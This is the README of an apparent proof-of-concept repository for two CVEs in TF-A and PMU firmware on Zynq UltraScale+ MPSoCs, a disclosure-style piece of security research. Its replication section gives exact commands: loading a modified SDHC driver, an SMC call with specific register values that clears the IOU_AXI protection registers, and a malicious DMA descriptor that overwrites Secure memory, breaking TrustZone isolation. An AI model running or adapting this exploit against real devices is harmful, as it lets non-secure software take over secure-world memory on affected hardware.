# Breaking TrustZone on Zynq UltraScale+ MPSoCs - Proof of Concept for CVE-2025-48507 and CVE-2025-0038 

Non-Secure Software could exploit CVE-2025-48507 and CVE-2025-0038 to gain read/write access to Secure World on **Zynq UltraScale+ platforms**, thereby breaking TrustZone isolation. To that extent, Non-Secure Software exploits CVE-2025-0038 and **CVE-2025-48507** to clear IOU_AXI_WPRTCN and IOU_AXI_RPRTCN registers (0xFF240000) to switch the SD Host Controller as a Secure Master. Then, Non-Secure software (e.g. Linux) leverages the SD Host Controller (slave interface is still Non-Secure) to write to or read from any Secure memory.

**More information:** 

- **AMD's security bulletins:**
  - AMD-SB-8008 (CVE-2025-0038) [https://docs.amd.com/r/en-US/000037628/CVE-Details](https://docs.amd.com/r/en-US/000037628/CVE-Details)
  - AMD-SB-8017 (CVE-2025-48507): [https://docs.amd.com/r/en-US/000039030/CVE-Details](https://docs.amd.com/r/en-US/000039030/CVE-Details)
  - 
- **PowerPoint presentation of the PoC:** /doc/PoC_Exploit_presentation.pdf
- **Video of the PoC:** https://www.dropbox.com/scl/fi/2ug3w9ukf366g4mi5g7y7/CVE-PoC.mp4?rlkey=9zgdayte0vv4114assf0grfgg&st=9qupyn9d&dl=0
- **Original research article (Section 5.5):** /doc/preprint.pdf


**Affected platforms**: 

- Kria™ SOM
- Zynq UltraScale+ MPSoCs
- Zynq UltraScale+ RFSoCs

**Affected components:** 

- Arm Trusted Firmware for Cortex-A processors (TF-A) and PMU Firmware versions up through 2025.1.


### Organization of this Repo:

- **source/ :** Source for reproducing this PoC on Zynq UltraScale+ MPSoCs (ZC104)

  - <u>To leverage CVE-2025-48507 and CVE-2025-0038</u> 

    - **smc-tt.c:** Basic Kernel module that allows Non-Secure Linux to issue arbitrary SMC calls.

    - **Makefile:** A Makefile for cross-compiling kernel modules (Paths must be adapted).

  - <u>To exploit CVE-2025-0038 and CVE-2025-48507</u>
    - **sdhc.c:** Modified SDHC driver that allows making DMA attacks using the SD Host Controller (SDHC)
    - **dma_patch.sh:** A convenient script that relies on the modified SDHC driver to patch arbitrary memory regions through DMA capabilities of the SDHC

- **doc/ :** Presentations and research article detailing the security vulnerabilities at TF-A and PMU levels.

- **hw_debug/:** Hardware debugger scripts for debugging TF-A on the APU and the PMU processor. They provide an environment for debugging the affected functions in the PMU firmware and TF-A and confirm the success of the attack. These scripts are to be used with Trace32 and a Lauterbach PowerDebug PRO JTAG hardware debugger. The hardware debugger has been connected to the JTAG port (J180) of the ZCU104. 

### Replication of the Attack

##### <u>Building the Environment:</u>

1. Build an affected environment (i.e., Linux, TF-A, PMU Firmware...).
    - e.g., Petalinux's pre-built images, Yocto, Petalinux tools...

2. When building Linux, set the SDHC driver as loadable kernel module through kconfig. This is required only for exploitation.
    - MMC_SDHCI=M

3. Compile the kernel modules **smc-tt.c** and **sdhci.c** . The Makefile provided can be used by adapting the kernel and compiler paths.
4. To leverage the CVEs, add **smc-tt.ko** to Linux rootfs
5. For exploitation of the CVEs, add **sdhci.ko** and **dma_patch.sh** to Linux rootfs



**<u>PoC et Exploit of the CVEs:</u>**

*In the PoC, the system (i.e., fslb, uboot...) was booted from an SD card. Linux's rootfs was flashed on a USB. For the DMA attack, Linux used an empty partition of the SD card accessed by the SD Host Controller driven by the modified SDHC driver (sdhci.ko).* 

**To only test for the CVEs, steps 2, 3 and 5 can be skipped.**

1. U-boot commands for booting Linux in Non-secure world with its rootfs on a USB partition:

   ```
   setenv bootargs root="/dev/sda" rw rootwait; fatload mmc 0 0x200000 Image && fatload mmc 0 0x1e0000 system.dtb && booti 0x200000 - 0x1e0000
   ```

2. Insert the modified SDHC driver to perform arbitrary DMA access:

   ```bash
   insmod /sdhci.ko
   insmod /lib/modules/6.6.70/kernel/drivers/mmc/host/sdhci-pltfm.ko
   insmod /lib/modules/6.6.70/kernel/drivers/mmc/host/sdhci-of-arasan.ko 
   ```

3. Try to patch Secure memory by leveraging the modified SDHC driver. This should **fail** as the SDHC is still Non-Secure:

   ```
   ./dma_patch.sh SECURE_MEMORY_PATCHED_BY_NON_SEC '\x00\x00\xdc\xff\x20\x00\x23\x00' /dev/mmcblk0p3
   ```

   - **ARG1:** PAYLOAD

   - **ARG2:** Malicious descriptor to perform rogue DMA access. 
     - E.g., '\x00\x00\xdc\xff\x20\x00\x23\x00' to patch 0x20 bytes at address 0xFFDC0000. \x23\x00 must be left as-is

   - **ARG3:** A device partition managed by the SD Host Controller controlled by the modified SDHC driver. 
     - E.g., /dev/mmcblk0p3

4. Exploit CVEs to **clear IOU_AXI_WPRTCN and IOU_AXI_RPRTCN (*0xFF240000*):**

   ```
   insmod /smc-tt.ko r0=0xc200002E r1=0xff24000000000100 r2=0x100000000
   ```

   - *0xc200002E:* Affected SMC call (PM_FPGA_READ). 

   - *0xff24000000000100:* Address to be cleared (0xFF240000) (i.e., IOU_AXI_RPRTCN/IOU_AXI_WPRTCN) and the number of bytes to clear (0x00000100)

   - *0x100000000:* Read the PL data back to main memory (0x1). As nothing was loaded, this will simply clears the targeted memory region.

   - More information on the parameters of PM_FPGA_READ: https://github.com/ARM-software/arm-trusted-firmware/blob/c8eb6b042b57a145945a80fe4949c6f678309925/plat/xilinx/zynqmp/pm_service/zynqmp_pm_api_sys.c#L1693


5. Try to patch Secure memory again (*0xFFDC0000*). This should succeed as **the SDHC is now Secure**:

   ```
   ./dma_patch.sh SECURE_MEMORY_PATCHED_BY_NON_SEC '\x00\x00\xdc\xff\x20\x00\x23\x00' /dev/mmcblk0p3
   ```
**Now Linux can leverage the SDHC DMA to fully access Secure Memory**
   
